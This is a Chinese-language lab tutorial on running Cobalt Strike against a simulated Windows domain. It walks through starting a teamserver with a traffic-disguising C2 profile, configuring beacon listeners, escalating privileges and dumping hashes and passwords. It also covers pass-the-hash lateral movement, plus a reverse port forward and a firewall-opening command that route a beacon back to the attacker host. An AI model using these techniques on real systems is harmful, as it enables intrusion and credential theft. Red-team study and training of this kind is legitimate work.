前言
本文以一个模拟的域环境为例对 Cobalt Strike
的使用实践一波。
环境拓扑图如下:
攻击者(kali
) 位于 192.168.245.0/24
网段,域环境位于 192.168.31.0/24
网段。
域中有一台 win7
有两张网卡,可以同时访问两个网段,以这台机器作为跳板机进入域环境。
启动 Cobalt Strike
首先起一个 teamserver
./teamserver 192.168.245.128 ad_hack malleable_c2/Malleable-C2-Profiles/normal/webbug_getonly.profile
设置了密码为 ad_hack
, 使用了一个配置文件对木马之间的通信做混淆(Cobalt Strike的第一个强大的特性)。
配置文件来源
https://github.com/rsmudge/Malleable-C2-Profiles
通过自定义配置文件,我们可以控制木马域服务器之间的通信,然后通信流量藏在正常的流量里面进行传递。
配置文件编写可以看下面的资料
https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/
然后在本地打开一个 Cobalt Strike
客户端连上 teamserver
其中 user
随便填, 密码和 ip
填刚刚设置好的,端口一般不用改。
如果需要改端口,貌似需要改改 teamserver
里面的代码。
因为我发现 teamserver
启动的使用实际是用 java
给主程序加了端口的参数
启动listener
用于处理 beacon
的通信,主要分为两类
beacon | Cobalt Strike 自带的 shell,该shell所支持的通信协议主要包括 dns、https、http、smb。 |
---|---|
foreign | 用于把 beacon shell 派生一个 Meterpreter |
首先我们先新建一个监听器,
这里配置的是 Cobalt Strike
服务端会监听在 192.168.245.128:8989
,等待 reverse_http
类型的 beacon
通信。
点击 save
会让我们配置 beacon
的通信地址。
这里配置为 192.168.245.128
,之后 beacon
在被攻击的机器上执行会尝试与 192.168.245.128:8989
进行通信。
如果在内网里面的话,有时某些机器反弹不出来就需要配置这个地址为 内网某个已经拿到权限的机器,然后在该机器上配置端口转发,转发到 listener
, 后面用到的时候再详谈。
生成并传递 beacon给跳板机
首先生成一个 exe
格式的 beacon
, 实战中可以使用其他的比如 powershell
, shellcode
方便做一些免杀的操作。
配置 listener
然后以某种方式让跳板机执行, 这里我就直接拖进去执行了。过一会就上线了
提权及dump hash
首先尝试提权, cs
自带了两个 exp
, 然后 github
里面还有几个,一起导入。
https://github.com/rsmudge/ElevateKit
提权之前我们先开一个 smb
通信的 listener
这种 listener
使用 windows
的命名管道进行 点对点 通信, 又因为 命名管道 是在 smb
协议里面进行传输的,所以这个 listener
叫 smb_pipe
.
cs
的这种通信方式是一个非常大的亮点,因为内网中的很多机器其实是反弹不出来的, 但是使用命名管道进行 点对点 通信 的话, 就不用考虑反弹的问题, beacon
之间通过 smb
进行通信, 然后一个顶层的 beacon
使用不同的通信策略和 listener
转发其他 beacon
的通信。
不过 smb
这种 beacon
的使用限制还是比较大的,现在我知道的有两种方式可以实现这样的通信
- 在一个
beacon
上使用pth
或者提权 等操作拿到的beacon
可以使用这种beacon
- 其他的
beacon
可以通过link
指令使用beacon
通信。
这里我们是提权可以使用这种 beacon
等待一会,就会派生出一个 system
权限的 beacon
如果是使用 smb
命名管道通信的 beacon
会用线连接起来, 箭头指向为子 beacon
, 箭头开始为父 beacon
.子 beacon
直接与父 beacon
通信,比如接收命令以及返回结果。
然后我们在 system
权限的进程下 dump hash
, 在图形化界面选中目标,然后右键。
或者可以直接输命令
又或者抓下明文密码
可以通过 credentials
菜单查看所有的 凭据 (账户密码及hash
)
横向渗透
接下来我们应该需要看看本网络还有啥其他的主机,然后利用已经拿到的凭据进行横向渗透。
结果可以在 Targets
选项卡里面找到
或者可以开个 socks
代理,用 nmap
来扫扫
使用 deploy vpn
会在 teamserver
所在的机器开一个虚拟网卡,通过这个网卡我们可以接入内网,可以直接使用 ifconfig
以及 dhclient
来操作网卡。
下面使用已经获取到的 凭据进行 pth
攻击。按住 ctrl
选择多个目标,然后右键选择各种方式进行测试。
假设 192.168.31.130
也就是那个 xp
上可以执行 payload
, 由于他不能出内网,所以无法直接反弹,下面使用反向端口转发 ,来反弹一个 beacon
首先在 跳板机 (192.168.31.129) 做反向端口转发
beacon> rportfwd 9898 192.168.245.128 9898
把本机的 9898 端口转发到 192.168.245.128 9898
由于域的安全机制,我们需要手动开下端口放行的规则
netsh firewall set portopening TCP 9898 ENABLE
下面创建一个 listener
, 监听 9898
端口,并且让 beacon
反弹到 192.168.31.129:9898
, 因为有反向端口转发,所以会连接到我们的 teamserver
然后创建一个 exe
格式的 payload
, 记得使用 stageless
.
然后就会反弹成功。